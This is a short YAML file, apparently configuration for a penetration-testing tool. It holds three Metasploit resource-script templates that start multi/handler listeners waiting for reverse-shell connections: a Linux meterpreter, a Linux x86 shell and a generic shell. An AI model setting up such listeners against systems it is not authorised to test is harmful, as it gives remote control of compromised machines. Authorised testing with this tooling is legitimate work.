meterpreter: |
    use multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set lhost 0.0.0.0
    set lport {settings.handlerport}
    <ruby>
        sleep(2)
    </ruby>
    run {run_options}
reverse_tcp: |
    use multi/handler
    set payload linux/x86/shell_reverse_tcp
    set lhost 0.0.0.0
    set lport {settings.handlerport}
    <ruby>
        sleep(2)
    </ruby>
    run {run_options} 
reverse_generic_shell: |
    use multi/handler
    set payload generic/shell_reverse_tcp
    set lhost 0.0.0.0
    set lport {settings.handlerport}
    <ruby>
        sleep(2)
    </ruby>
    run {run_options} 
